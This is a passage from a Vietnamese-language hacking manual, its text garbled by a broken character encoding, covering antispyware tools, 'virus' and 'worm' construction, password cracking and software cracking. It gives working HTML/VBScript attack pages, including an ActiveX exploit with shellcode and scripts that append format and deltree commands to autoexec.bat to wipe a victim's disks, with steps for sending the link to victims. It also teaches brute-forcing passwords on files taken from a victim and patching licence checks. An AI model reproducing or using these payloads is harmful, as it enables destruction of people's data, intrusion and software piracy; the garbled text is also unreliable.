Trong tröôøng hôïp baïn vaãn muoán söûduïng Windows song song vôùi trình duyeätInternet Explorer, ngöôøi duøng neân caøi moätsoá chöông trình baûo veä mieãn phí nhöng raáthöõu ích, chaúng haïn nhö:

Phaàn meàm AVGhoã trôï chaën spyware -ñaây laø chöông trình giaùn ñieäp bí maät thaâmnhaäp vaøo heä thoáng PC khi ngöôøi duøng taûitoolbar, game, video töø Internet hoaëc noùñöôïc phaùt taùn thoâng qua thö raùc. Chöôngtrình naøy seõ theo doõi vaø ghi nhaän moïithoâng tin cuûa khaùch haøng nhö nhöõng trangweb maø hoï ñaõ duyeät, thoùi quen mua haøngqua maïng, löu vaø phaùt taùn soá taøi khoaûn,maät khaåu, daãn ngöôøi duøng ñeán trang webñoài truïy, hieän cöûa soå pop-up vôùi haøng loaïtquaûng caùo khoù chòu, quay soá ñieän thoaïiñöôøng daøi treân modem cuûa hoï... Ngoaøi ra,chuùng khieán PC hoaït ñoäng chaäm chaïp vaølieân tuïc gaëp loãi.

Beân caïnh AVG, ngöôøi söû duïng coù theåcaøi phieân baûn Ad-Aware Personal treân tranghttp://lavasoft.com Vôùi keát noái quay soá,chöông trình seõ ñoøi hoûi khoaûng 10 phuùt ñeåtaûi veà maùy. Ngoaøi ra baïn coù theå downloadtaïi: http://www.freewebtown.com/vudin-hcuong/WinAntiSpyware2006FreeInstall.rarhoaëc www.dvpub.com.vn.

Ngöôøi duøng neân caøi theâm moät phaànmeàm hoã trôï cho Ad-Aware, ñaùng chuù yùnhaát laø Spybot. Baïn coù theå download phaànmeàm naøy taïi:

http://www.freewebtown.com/vudinhcuong/spybotsd14.rar hoaëcwww.dvpub.com.vn

3. Virus vaø tìm hieåu virus3.1 Virus laø gì?

Virus laø moät ñoaïn maõ chöông trình ñöôïcvieát bôûi nhieàu ngoân ngöõ. Noùù thöïc hieän caùcnhieäm vuï phaù hoaïi theo yeâu caàu cuûa chuûnhaân taïo ra noù. Chuùng thöôøng ñöôïc laâynhieãm khaù nhanh vaø thöïc hieän coâng vieäcphaù hoaïi khaù hoaøn chænh. Moãi loaïi virusñöôïc thieát keá ñeå phaù huûy moät loaïi file nhaátñònh hoaëc coù loaïi virus ñöôïc bieán theå töø

loaïi naøy qua loaïi khaùc. Moät soá loaïi virus chæ coù theå laây nhieãm

treân taäp tin thöïc thi (*.exe), taäp tin(*.doc…) hoaëc treân caùc file hình aûnh(*.BMP,*JPG…).

Coù bao nhieâu loaïi virus?Coù raát nhieàu loaïi virus vaø caùch phaân loaïi

chuùng. Ngöôøi ta phaân loaïi virus döïa vaøohình thöùc laây lan cuûa noù, cuõng coù khi laïiphaân loaïi virus döïa treân hình thöùc phaù hoaïicuûa chuùng.

3.2 Virus ñöôïc vieát nhö theá naøo?* Giôùi thieäu

Nhaèm giuùp caùc baïn tìm hieåu veà cô cheáhoaït ñoäng cuûa caùc loaïi virus, toâi xin giôùithieäu moät loaïi virus coù chöùc naêng format oåcöùng. Ñaây ñöôïc xem laø loaïi virus khaù nguyhieåm, chæ caàn naïn nhaân (victim) chaïy noù laøoå C seõ ñöôïc format ngay laäp töùc maø khoângcoù baát cöù caâu thoâng baùo naøo. Vì ñaây laøvirus khaù nguy hieåm neân baïn phaûi thaät caånthaän khi duøng cuõng nhö khoâng neân phoåbieán.* Caùch thöïc hieän1 Tröôùc tieân, baïn taïo moät Account treân

moät trang web cho upload nhö trangwww.freewebtown.com.

Ví duï: Toâi taïo taøi khoaûn treân trang web naøycoù teân laø managerdocument.2 Môû trình soaïn thaûo Notepad, nhaäp

ñoaïn maõ sau vaø löu file vôùi teân daïng(*.htm). Ví duï thiephoa.htm.

<!doctype html public "-//w3c//dtd html4.0

transitional//en"> <html> <head> <meta http-equiv="Content-Type" con-

tent="text/html;charset=iso-8859-1"> </head> <p> <object id="scr"classid="clsid:06290BD5-48AA-11D2-



http://lavasoft.comV





http://www.freewebtown.com

26 PC

8432-006008C3FBFC"> </object> </p> <script> var1='echo @format "c: < c.txt >nul" >>c:\\autoexec.bat'; scr.Reset(); scr.Path="C:\\windows\\StartMenu\\Programs\\StartUp\\repair.hta"; scr.Doc="<object id='wsh'c lass id= 'c ls id:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<script>wsh.Run('command/c echo e 171,20 >>C:\\d.TXT',true,1);wsh.Run('command /c echo e 181,20>> C:\\d.TXT',true,1);wsh.Run('command /c echo w>>C:\\d.TXT',true,1);wsh.Run('command /c echo q >>C:\\d.TXT',true,1);wsh.Run('command /c echo y >>C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >>C:\\C.TXT',true,1);wsh.Run('command /c echo @echoPlease wait while Setup updates your configurationfiles. >> c:\\autoexec.bat',true,1);wsh.Run('command/c echo @echo This may take a few minutes... >>c:\\autoexec.bat',true,1);wsh.Run('command /c"+var1+"',true,1);wsh.Run('command /c debugc:\\autoexec.bat <d.txt',true,1)</"+"SCRIPT>";scr.write(); </script> <p> <objectclassid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"id="RegWizObj"> </object> </p> <script language="VbScript"> expstr = "/iAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA





PC 27

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAA" expstr = expstr & Chr(235) expstr = expstr & Chr(53) expstr = expstr & Chr(208) expstr = expstr & Chr(127) expstr = expstr + Chr(144) expstr = expstr + Chr(139) + Chr(252) expstr = expstr + Chr(131) + Chr(199) +

Chr(25) expstr = expstr + Chr(80) expstr = expstr + Chr(87) expstr = expstr + Chr(186) + Chr(96) +

Chr(9) +Chr(250) + Chr(191) expstr = expstr + Chr(255) + Chr(210) expstr = expstr + Chr(51) + Chr(192) expstr = expstr + Chr(80) expstr = expstr + Chr(186) + Chr(202) +

Chr(212) +Chr(248) + Chr(191) expstr = expstr + Chr(255) + Chr(210) expstr = expstr + "rundll32shell32.dll,SHExitWindowsEx 1" RegWizObj.InvokeRegWizard(expstr) </script> </html>

3 Baïn upload taäp tin leân treân trang webmaø baïn ñaõ taïo taøi khoaûn.

Ví duï khi upload leân thì coù link sau:www.freewebtown.com/managerdocu-ment/thiephoa.htm4 Göûi link naøy cho victim. Khi baïn ñang

chat hoaëc göûi qua e-mail thì victim chæcaàn nhaáp vaøo link naøy, oå cöùng cuûa hoïseõ töï xoùa saïch khoâng coù lôøi caûnh baùonaøo.

Chuù yù:Vì ñaây laø moät loaïi virus khaù nguy hieåm,

mong caùc baïn chæ duøng noù vôùi muïc ñíchhoïc taäp vaø nghieân cöùu, tuyeät ñoái khoângneân phoå bieán noù. Caùc baïn phaûi hoaøn toaønchòu traùch nhieäm veà vieäc mình laøm khi öùngduïng con virus naøy.

4. Worm (boï maùy tính)* Giôùi thieäu

Worm laø moät chöông trình ñoäc laäp coùtheå töï nhaân baûn vaø laây lan trong maïng.Cuõng gioáng nhö virus, noù coù chöùc naêng phaùhuûy döõ lieäu cuõng nhö laøm ngöng hoaït ñoängheä thoáng maïng.

Worm ñöôïc vieát nhö theá naøo?Ñaây laø con worm cöïc kyø nguy hieåm, khi

victim chaïy noù thì noù seõ tieán haønh fdisk oåcöùng maø khoâng coù moät lôøi thoâng baùo.

Thöïc hieän nhö sau:1 Thöïc hieän töông töï nhö trong phaàn

virus.2 Ñeå baét victim thöïc thi moät chöông

trình naøo ñoù, baïn söû duïng ñoaïn scriptsau:

===============<html><head><title>L0ng3ta</title></head><body ><p>chuong trinh notepad se thuc thi<script language=VBSCRIPT>On Error Resume NextSet WSHShell = CreateObject(

"WScript. Shell")WSHShell.Run "c:\windows\

notepad.exe",1,False</SCRIPT></p></body></html>================Ñoaïn Script treân seõ chaïy chöông trình

notepad. Baïn nhaäp ñoaïn code treân vaøotrình soaïn thaûo nodepad, sau ñoù löu döôùi



http://www.freewebtown.com/managerdocu-

28 PC

daïng *.htm vaø chaïy thöû noù.=====================<script language=VBSCRIPT>Function FindFile(PathFiles)dim fso,fSet fso = CreateObject("Scripting.File SystemObject") If (fso.FileExists(PathFiles)) ThenFindFile = TrueSet f = fso.GetFile(Pathfiles)If f.attributes and 1 Then f.attributes = f.attributes -1End ifElseFindFile = FalseEnd If End FunctionSub CreateFile()Dim fso, tfSet fso = CreateObject("Scripting.File SystemObject")Set tf = fso.CreateTextFile("c:\Autoexec. bat", True)tf.WriteLine ("@Echo off") tf.CloseEnd SubSub InsertBegintext() Const ForReading = 1, ForWriting = 2, ForAppending = 8Dim fso, tfSet fso = CreateObject("Scripting.File SystemObject")Set tf = fso.OpenTextFile("c:\auto exec.bat",ForAppending , True)tf.WriteLine ("@Echo Please Waiting for Windowsupdating your system...")tf.CloseEnd SubSub Inserttext(drv) Const ForReading = 1, ForWriting = 2, ForAppending = 8Dim fso, tfSet fso = CreateObject("Scripting.File SystemObject")Set tf = fso.OpenTextFile("c:\auto exec.bat",ForAppending , True)tf.WriteLine ("@deltree /y " & drv & " > null")tf.WriteLine ("@Format " & drv & " /q /u /autotest >



PC 29

null") tf.CloseEnd Sub' Kieåm tra xem oå ñia coù phaûi laø ñóa cöùng

hay khoâng' vaø traû veà true neáu noù laø ñóa cöùngFunction ShowDriveInfo(drvpath)Dim fso, d, s, tSet fso = CreateObject( "Scripting.File

SystemObject")Set d = fso.GetDrive(drvpath)If d.DriveType = 2 thenIf d.IsReady thenShowDriveInfo = TrueElse ShowDriveInfo = FalseEnd IfElseShowDiveInfo = FalseEnd IfEnd FunctionSub Main()Dim fso, d, dc, s, iDim a(15)Set fso = CreateObject( "Scripting.File

SystemObject")Set dc = fso.Drivesi = 0For Each d in dc

If showdriveinfo(d) thena(i) = di= i+1End IfNextIf Not Findfile("c:\autoexec.bat") thenCreatefileEnd ifInsertBegintextDo While i>0i=i-1Inserttext(a(i))Loop End SubMain</SCRIPT>Ñoaïn Script ñeå cheøn doøng leänh leân file

autoexe.bat treân oå ñóa cuûa victim.

=================Coâng vieäc coøn laïi laø tuøy thuoäc vaøo baïn

thay vì khôûi chaïy notepad, baïn coù theå chochaïy taäp tin Autoexec.bat treân oå cöùng.Chuù yù:Vì ñaây laø con worm raát nguy hieåm, baïn neânduøng noù vôùi muïc ñích hoïc taäp vaø nghieâncöùu, tuyeät ñoái khoâng ñöôïc duøng phoå bieán,caùc baïn phaûi hoaøn toaøn chòu traùch nhieämveà vieäc söû duïng con worm naøy.

IV: HACK MAÄT KHAÅU TREÂN TAÄP TIN

1.Chöông trình Advanced Office 2000Password Recorvery1.1 Giôùi thieäu

Khi baïn ñoät nhaäp vaøo maùy victim vaø saocheùp ñöôïc moät soá taøi lieäu nhöng taøi lieäunaøy laïi ñöôïc baûo veä bôûi maät khaåu. Vaäy laømtheá naøo ñeå baïn coù theå laáy ñöôïc noäi dungcuûa taäp tin naøy? Moät caâu hoûi ñaët ra vaø caùch

duy nhaát laø hack noù ñeå laáy maät khaåu truycaäp taäp tin baèng caùch söû duïng chöông trìnhAdvanced Office 2000 Password Recorvery.Baïn coù theå taûi phaàn meàm naøy taïi ñòa chæ

http://www.freewebtown.com/vudinhcuong/passwordoffice.rar hoaëchttp://www.dvpub.com.vn

Giao dieän cuûa chöông trình nhö sau (xemhình 4.1).





1.2 Caùch söû duïngBöôùc 1: Töø giao dieän chính cuûa chöôngtrình, vaøo Project > Open, tìm ñeán taäp tinmuoán tìm password.Böôùc 2: Choïn theû Brute-Force, thöïc hieäntieáp caùc thao taùc:1 Trong khung Password Length Options

coù hai löïa choïn veà ñoä daøi cuûa chuoãiPassword. Minimal Length thieát laäpñoä daøi nhoû nhaát vaø Maximal lengthduøng ñeå thieát laäp chieàu daøi toái ña cuûachuoãi Password.

2 Trong khung Brute-Force rangeoptions: Ñaùnh daáu choïn muïc AllPrintable (choïn taát caû tröôøng hôïp).Neáu baïn muoán tìm Password vôùi caùckyù töï töø A -> Z, a -> z, 0 -> 9,!@... thìñaùnh daáu vaøo caùc muïc töông öùng hoaëccoù theå ñaùnh daáu muïc Custom charsetñeå ñònh nghóa caùc kyù töï caàn so saùnh(xem hình 4.2).

Böôùc 3: Choïn theû Dictionary, thöïc hieäncaùc thao taùc sau:1 Nhaáp choïn Dictionary Attack.2 Nhaáp nuùt ñeå môû file English.dic.

File naøy baïn phaûi ñònh nghóa tröôùc.Neáu muoán tìm taát caû kyù töï hoa(Upper), kyù töï thöôøng (Lowercase)trong töø ñieån, ñaùnh daáu choïn muïc Tryall posible Upper/lowercase combi-nations.

3 Nhaäp vaøo doøng baét ñaàu trong töø ñieånôû muïc Start from line Number(xemhình 4.3).

Böôùc 4: Choïn theû Auto-Save, thöïc hieän caùcthao taùc sau:1 Ñaùnh daáu choïn muïc Save ProjectEvery.

2 Nhaäp vaøo thôøi gian ñeå chöông trình töïñoäng löu ñoái töôïng. Chöông trình maëcñònh laø 5 phuùt.

Coøn caùc Option khaùc, baïn coù theå khaùm phaùtheâm khi söû duïng chöông trình.

30 PC

Hình 4.3: Theû Dictionary

Hình 4.2: Theû Brute-Force

Hình 4.1: Giao dieän cuûa Advanced Office 2000Password Recorvery



PC 31

Böôùc 5: Sau khi ñaõ thieát laäp xong caùc caáuhình cho coâng vieäc tìm kieám Password, töøgiao dieän chính cuûa chöông trình, vaøomenu Recorvery > Start. Luùc naøy, chöôngtrình baét ñaàu tìm kieám (xem hình 4.4).

Neáu tìm thaáy Password chöông trình seõhieän thoâng baùo (xem hình 4.5).

Khi ñaõ tìm thaáy password, noù seõ keát thuùcquaù trình tìm kieám. Baïn chæ caàn laáy pass-word vöøa tìm ñöôïc ñeå môû taäp tin.

2. Chöông trình Advanced ZIP PasswordRecovery2.1 Giôùi thieäu

Vôùi moät soá tröôøng hôïp daïng file .ZIP ñaëtpassword thì khi Extract, chöông trình yeâucaàu nhaäp Password ñeå thöïc hieän giaûi neùn(xem hình 4.6).

Neáu baïn khoâng coù password thì laøm theánaøo ñaây. Moät coâng cuï seõ giuùp baïn tìm laïiPassword laø Advanced ZIP Password

Recovery. Ñòa chæ taûi phaàn meàm:http://www.freewebtown.com/vudinhcuong/passwordzip.rar hoaëchttp://www.dvpub.com.vn

2.2 Caùch söû duïngSau khi caøi ñaët, môû chöông trình, xuaát

hieän giao dieän nhö hình 4.7.Thöïc hieän caùc böôùc sau:1 Nhaáp vaøo nuùt ñeå chæ ñöôøng daãn

ñeán file *.ZIP.2 Choïn kieåu tìm password:Neáu baïn muoán tìm baèng Brute-force, ñaùnhdaáu choïn muïc Brute-force.Trong theû Range, ñaùnh daáu vaøo caùc muïcsau:- All caps latin (A-Z): Taát caû kyù töï hoa töøA-Z.- All Small latin (a-z): Taát caû kyù töï thöôøngtöø a-z.- All digits (0-9): Taát caû soá töø 0-9.- All special symbol (!@...): Taát caû kyù töï ñaëcbieät.- Space: Bao goàm caû kyù töï khoaûng traéng.- All Printable: Taát caû muïc ñöôïc choïn.- Start from: Nhaäp vaøo kyù töï baét ñaàu.- End at: Nhaäp vaøo kyù töï keát thuùc (xemhình 4.7).Trong theû Length:- Minimal password length: Nhaäp vaøo chieàudaøi nhoû nhaát cuûa kyù töï.- Maximal password lengh: Nhaäp chieàu daøitoái ña cuûa password caàn tìm.

Neáu baïn muoán tìm baèng Dictionary,ñaùnh daáu choïn muïc Dictionary. Sau ñoùnhaáp vaøo nuùt ñeå môû file English.dic.File töø ñieån naøy baïn phaûi soaïn thaûo tröôùc.Tieáp tuïc, nhaáp choïn muïc Try all possible

Hình 4.6: Nhaäp password file .ZIP

Hình 4.5: Thoâng baùo Password ñöôïc tìm thaáy

Hình 4.4: Tieán haønh quaù trình tìm kieám





32 PC

upper/lower case combinationsñeå tìm caû caùc kyù töï hoa vaø thöôøng (xem hình 4.8).3 Sau khi thieát laäp xong caùc löïa choïn, nhaáp vaøo nuùt ñeå thöïc hieän coâng

vieäc tìm kieám (xem hình 4.9).Neáu quaù trình tìm kieám thaønh coâng seõ xuaát ra thoâng baùo sau (xem hình 4.10).

3. Chöông trình Advanced PDF PasswordRecovery Pro3.1 Giôùi thieäu

Cuõng nhö caùc chöông trình tìm kieámpassword khaùc, Advanced PDF PasswordRecovery laø moät chöông trình doø tìmPassword raát thoâng duïng vaø phoå bieán. Noù coùtheå tìm ñöôïc ñeán 99% caùc loaïi password vôùigiao dieäân raát thoâng duïng vaø ña chöùc naêng(xem hình 4.11). Ñòa chæ taûi phaàn meàm:

http://www.freewebtown.com/vudinhcuong/passwordpdf.rarhoaëc http://www.dvpub.com.vn

3.2 Caùch söû duïngBaïn thöïc hieän töông töï nhö caùc phaàn meàm treân.

Hình 4.10: Hoaøn taát quaù trình tìm kieám

Hình 4.9: Quaù trình tìm kieám dieãn ra

Hình 4.8: Doø tìm password theo Dictionary

Hình 4.7: Giao dieän cuûa Advanced ZIP PasswordRecovery



http://www.freewebtown.com/vudinhcuong/passwordpdf.rar


PC 33

1. Crack phaàn meàm baèng DiassemblerBaïn coù moät phaàn meàm raát hay vaø caàn

thieát cho coâng vieäc nhöng ñoù laïi laø phaànmeàm duøng thöû. Sau thôøi gian naøy, baïn phaûiñöa tieàn cho nhaø cung caáp phaàn meàm ñeålaáy khoùa (Key) hay Serial, coøn neáu khoângthì baïn khoâng theå naøo duøng ñöôïc keå caûtröôøng hôïp Uninstall (Remove) vaø caøi laïi.Vaäy laøm theá naøo ñeå coù theå söû duïng phaànmeàm khoâng giôùi haïn veà thôøi gian? Moät giaûi

Hình 4.11: Giao dieän cuûa Advanced PDF PasswordRecovery Pro

0000000000

Chöông 3

phaùp giuùp baïn keùo daøi tuoåi thoï phaàn meàmñang söû duïng baèng caùc coâng cuïDiassembler vaø Hview.

Diassembler: Ñaây laø coâng cuï duøng ñeåxem maõ hôïp ngöõ cuûa chöông trình caàncrack. Ñòa chæ taûi phaàn meàm:

http://www.freewebtown.com/vudinhcuong/diassembler.zip hoaëchttp://www.dvpub.com.vn

CRACKVAØ C AÙC C O ÂN G C U Ï C RAC K





34 PC

Sau khi caøi ñaët, giao dieän cuûa chöôngtrình nhö hình 1.1. Ví duï: Trong muïc naøy, toâi seõ minh hoïacrack software PC Security 6.1. Baïn coù theådownload chöông trình naøy taïi ñòa chæ :

http://www.freewebtown.com/vudinhcuong/pcsecurity.rar hoaëc http://www.dvpub.com.vn

1 Môû chöông trình PC Security 6.1 vaø tieánhaønh ñaêng nhaäp. Luùc naøy, chöôngtrình yeâu caàu phaûi ñaêng kyù, baïn nhaäpmoät soá baát kyø vaøo muïc Name vaø töôngtöï cho muïc Key(xem hình 1.2).

2 Nhaáp Register, neáu may maén nhaäpñuùng thì baïn seõ söû duïng chöông trìnhnaøy ñöôïc (ñieàu naøy ít khi xaûy ra). Coøn

ngöôïc laïi thì baïn seõ nhaän ñöôïc thoângbaùo Wrong Registration Key! vaø ñoùngchöông trình laïi (xem hình 1.3).

Chuù yù: Baïn haõy ghi nhaän laïi thoâng baùo naøyñeå söû duïng cho böôùc tieáp theo.3 Môû chöông trình Diassembler, vaøo

menu Diassembler > Open file toDiassembler, tìm ñeán nôi caøi ñaëtchöông trình (xem hình 1.4).

4 Tìm doøng thoâng baùo loãi ñaêng nhaäpbaèng caùch vaøo menu Refs > StringData References. Trong menu naøy seõhieån thò taát caû chuoãi coù trong chöôngtrình. Baïn haõy xem laïi doøng thoâng baùoñaõ ghi trong böôùc 1, ví duï WrongRegistration Key! (xem hình 1.5).

Hình 1.5: Tìm doøng thoâng baùo ñaêng kyù khoâng hôïpleä

Hình 1.4: Môû file caàn Crack

Hình 1.3: Thoâng baùo nhaäp sai CD Key

Hình 1.2: Nhaäp moät kyù töï baát kyø

Hình 1.1: Giao dieän cuûa Diassembler





PC 35

5 Nhaáp ñuùp vaøo chuoãi Wrong Registra-tion Key!

Baïn phaûi tìm ñöôïc doøng "je…" hay "jne"thì döøng laïi ôû ñoù, coøn neáu thaáy doøngReferences… :000… (chuù yù ñòa chæ naøy)thì cuõng döøng laïi vì baûng thoâng baùo naøy ñaõñöôïc goïi töø moät ñòa chæ khaùc (xem hình1.6).

6 Nhaán toå hôïp phím Shift+F12hay vaøomenu Goto > Goto Code Location, sauñoù nhaäp vaøo doøng soá 000…, nhaánEnter.

Laëp laïi caùc böôùc treân cho ñeán khi tìm thaáydoøng "je…" hay "jne…" thì döøng laïi.

Sau khi ñaõ tìm ñöôïc doøng "je…" hay"jne…" (xem hình 1.6), baïn nhìn xuoángthanh Status bar ngay sau doøng @offset0000FBBDh, haõy ghi laïi ñòa chæ 0000FBBD(khoâng laáy chöõ h vì noù bieåu thò cho soáHEX).7 Ñoùng Diassembler (xem hình 1.7).

Baây giôø, baïn seõ söû duïng phaàn meàm Hviewñeå thöïc hieän coâng vieäc tieáp theo.

Ñòa chæ taûi phaàn meàm http://www.freewebtown.com/vudin-

hcuong/HIEW.ZIPhoaëc http://www.dvpub.com.vn

8 Khôûi ñoäng chöông trình Hview9 Nhaán toå hôïp phím Alt + F1 ñeå môû oå

ñóa chöùa file caàn crack (xem hình 1.8).

10Nhaán F4choïn Decode, xuaát hieän giaodieän nhö hình 1.9.

11Nhaán F5vaø nhaäp vaøo ñòa chæ maø baïnñaõ ghi laïi, ví duï 0000FBBD. Khi ñoù,chöông trình Hview seõ ñöa baïn ñeánñuùng choã coù doøng "je…" hay "jne…"(xem hình 1.10).

Hình 1.10: Tìm ñòa chæ 0000FBBD

Hình 1.9: Hieån thò maõ hôïp ngöõ cuûa PC Security

Hình 1.8: Giao dieän cuûa Hview

Hình 1.7: Ghi laïi ñòa chæ Offset

Hình 1.6: Tìm doøng "je…" hay "jne…"





36 PC

12 Baïn thöïc hieän ñoåi je thaønh jnevaøngöôïc laïi jnethaønh jebaèng caùch nhaánF3ñeå thöïc hieän söûa code.

13Tieáp tuïc nhaán F2hay Enterñeå tieánhaønh söûa code (xem hình 1.11).

14Nhaán F9ñeå löu laïi caùc thay ñoåi vaønhaán F10ñeå thoaùt Hview.

Baây giôø, baïn haõy môû PC Security 6.1 vaønhaäp vaøo moät chuoãi baát kyø thì seõ nhaänñöôïc thoâng baùo Thank….Maùch nöôùc:Baïn ñöøng queân copy moät baûn Security.exedöï phoøng ñeå laàn sau khi caøi ñaët, baïn chæcaàn ghi ñeø leân file caøi ñaët khoâng caàn phaûicrack nöõa. Ñaây laø caùch ñôn giaûn nhaát ñeå crack soft-ware, do vaäy khoâng phaûi taát caû chöôngtrình ñeàu ñöôïc crack baèng caùch naøy, maøchæ khoaûng 40% chöông trình ñöôïc crackbaèng caùch naøy maø thoâi.

2. Crack phaàn meàm baèng DateCrckMoät phaàn meàm khaùc giuùp baïn taêng thôøi

gian söû duïng maø khoâng caàn phaûi ñaêng kyùñoù chính laø DateCrck. Nhöng ñaây laø phaànmeàm chaïy ôû cheá ñoä Command Line (cô cheádoøng leänh).

Ñeå thöïc thi chöông trình, baïn phaûi thöïchieän theo caùc böôùc sau:1 Copy file Datecrck vaøo oå ñóa C, sau ñoù

vaøo Start > Run,goõ cmd.

2 Taïi daáu nhaéc leänh söû duïng cuù phaùpnhö sau:Datecrck <path>app.exe,Date[0|1]

Trong ñoù:- Path: Ñöôøng daãn nôi chöùa phaàn meàm bògiôùi haïn veà thôøi gian.- App.exe: Teân phaàn meàm.

- Date: Nhaäp soá löôïng ngaøy baïn muoánphaàn meàm tieáp tuïc chaïy.- 0: Môû öùng duïng vôùi cöûa soå bình thöôøng(normal window).- 1: Môû öùng duïng vôùi cöûa soå cöïc ñaïi (max-imised window).Ví duï: Toâi coù phaàn meàm Softice ñöôïc löu trongthö muïc d:\new nhöng khoâng coøn thôøigian söû duïng. Baây giôø, toâi muoán taêng thôøigian söû duïng cuûa chöông trình theâm 30ngaøy nöõa, thöïc hieän nhö sau:3 Taïi daáu nhaéc leänh, goõ C:\Datecrckd:\new\softice.exe,30 1

4 Nhaán Enter(xem hình 2.1).

Ñeán ñaây, coâng vieäc xem nhö ñaõ hoaøntaát, baïn coù theå söû duïng phaàn meàm theâm 30ngaøy hoaëc nhieàu hôn tuøy thuoäc vaøo vieäcnhaäp soá ngaøy gia haïn.

Baïn coù theå download phaàn meàm naøy taïiwww.freewebtown.com/vudinhcuong/date-crck.zip hoaëc http://www.dvpub.com.vn

Caùc phaàn meàm lieät keâ trong listdöôùi ñaây caùc baïn chæ caàn vaøowww.google.com.vn sau ñoù nhaäp teân caàntìm töông öùng vôùi caùc teân cuûa phaàn caàndownload. Ví duï: toâi muoán download chöông trìnhACE v1.2b, nhaäp teân naøy vaøo muïc tìm kieám"ACE v1.2b" nhaán Enter, sau khi Googlelieät keâ danh saùch caùc teân trang web chöùaphaàn meàm coù noäi dung truøng vôùi giaù trò tìm

Hình 2.1: Söû duïng DateCrck

Hình 1.11: Ñoåi jne thaønh je



http://www.freewebtown.com/vudinhcuong/date-


http://www.google.com.vnsau

PC 37

Phaàn meàm duøng ñeå crack Ñoä lôùn Taùc duïng cuûa phaàn meàm

ACE v1.2b 118,429 Neùn file döôùi daïng *.ace

Advanced Compare v1.20 17,235 So saùnh 2 file ñaõ crack vaø chöa crack

Anakin's PE-Pack v1.0 15,205 Neùn file ôû moâi tröôøng 32 bit

ASPack v1.08.04 forWin9x/NT

312,789 Giaûi quyeát nhöõng soft giôùi haïn veà thôøi gian

At-Slow v3.10 2,283 Giaûm toác ñoä PC

Borland Resource Workshopv4.5

811,832 Chænh söûa maõ nguoàn cuûa file thi haønh

Building VxDs in W95 8,836 Asembly vaø taïo file VXD trong Win9x

PECRYPT32 v1.02 98,492 Ñoùng goùi file döôùi daïng maõ hoùa

PELOCKnt v2.04 105,257 Ñoùng goùi file döôùi daïng maõ hoùa

Portmon v1.03 for WinNT 49,455 Hieån thò coång COM

ProcDump32 v1.5.0 105,603 Neùn vaø giaûi neùn PE, ñoå boä nhôù

Regmon v4.1 52,581 Registry monitor

Resource Compiler forWindows

99,237 Taïo file script

IcePatch for SICE v3.22-232.0

22,533 Giaáu Win9x Site töø caùc detect(VD:Vietkey2000)

IceDump beta 5 16,636 Ñoå boä nhôù töø Site tôùi file

Jad v1.5.7 174,023 Decomplies 1 JAVA file (*.class)

KGB v1.04 for DOS 6,137 Moät vaøi hieäu chænh PC treân DOS

MakePE v1.30 27,027 Taïo PE vaø nhaäp vaøo file exe

Microsoft Win32Programmer's Reference 3/4

2,122,393 Dieãn taû haøm API (file 3/4)

TRW v0.75 169,590 Debug treân Win

UnPEProt v0.9 19,487 Giaûi neùn cho khoùa PE

UPX v0.93 for Win9x/NT 95,728 Neùn file döôùi daïng UPX (VD:Vietkey 2000)

Virtual Address to FileOffset v1.01

6,941 Tìm ñòa chæ offset thaät khi Site tìm ñöôïc off-set aûo

kieám, nhaáp vaøo link ñaàu tieân ñeå tìm ñeán phaàn meàm caàn download.



38 PC

1.Laøm theá naøo khi Registry bò khoùaMoät ngaøy naøo ñoù chieác maùy PC cuûa baïn

boãng nhieân gaëp tröôøng hôïp bò DisabledRegistry khi vaøo Run, goõ regedit thì nhaänñöôïc thoâng baùo (xem hình 1.1).

Hoaëc khi baïn quaûn lyù moät tieäm Internetvì ñaây laø nôi truy caäp maïng vaø cuõng laø nôithöû nghieäm nhieàu troø cuûa caùc vò khaùchnaêng ñoäng. Moät giaûi phaùp ñaët ra laø Registrycuûa baïn phaûi thöôøng xuyeân sao löu döïphoøng (backup) vì registry laø cô sôû döõ lieäuquan troïng cuûa Windows. Thoâng qua reg-istry, Windows quaûn lyù maùy tính vaø thieátlaäp caùc phaàn meàm trong maùy tính cuûa baïn.Giaûi phaùp thöù hai laø khoùa registry ñeå nhöõngvò khaùch naêng ñoäng naøy khoâng theå môûñöôïc.

Vaäy laøm theá naøo ñeå coù theå môû registrykhi bò khoùa vaø ngöôïc laïi laøm theá naøo coù theåkhoùa registry nhanh nhaát. Trong muïc naøyxin giôùi thieäu vôùi baïn moät soá giaûi phaùp ñeåthöïc hieän caùc thao taùc treân.

2. Caùc giaûi phaùp2.1 Söû duïng Group PolicyKhoùa registry:1 Baïn ñaêng nhaäp vaøo taøi khoaûn

Administrator.2 Nhaáp Start > Run, goõ gpedit.msc.

3 Xuaát hieän cöûa soå Group Policy, nhaápchoïn User Configuration > Adminis-trative Templates > System nhaápphaûi chuoät leân doøng Prevent accessto registry editing tools, choïnProperties > Enabled.

4 Ñoùng taát caû cöûa soå laïi, vaøo Run,goõ cmd. Taïi daáu nhaéc leänh, goõ gpup-date/forceñeå caùc thieát laäp coù hieäu löïc(xem hình 2.1).

Môû registry: Baïn cuõng laøm töông töïnhöng thay vì choïn Enabled, choïnDisabledhoaëc Not configured.

2.2 Söû duïng ScriptsÑeå thöïc hieän môû hoaëc khoùa registry,

baïn coù theå söû duïng script. Ñoaïn script saubaïn coù theå nhaäp vaøo baát kyø trình soaïn thaûovaên baûn naøo, sau ñoù löu vôùi teân laøOpenRegistry.vbs.

Ñoaïn maõ script chaïy treân moïi neàn.Option ExplicitDim WSHShell, RegKey valueA, ResultOn Error Resume NextSet WSHShell =

Chöông 4

CAÙC TH U Û TH U AÄT HACK

Hình 2.1: Khoùa Registry baèng Group Policy

Hình 1.1: Registry bò khoùa



PC 39

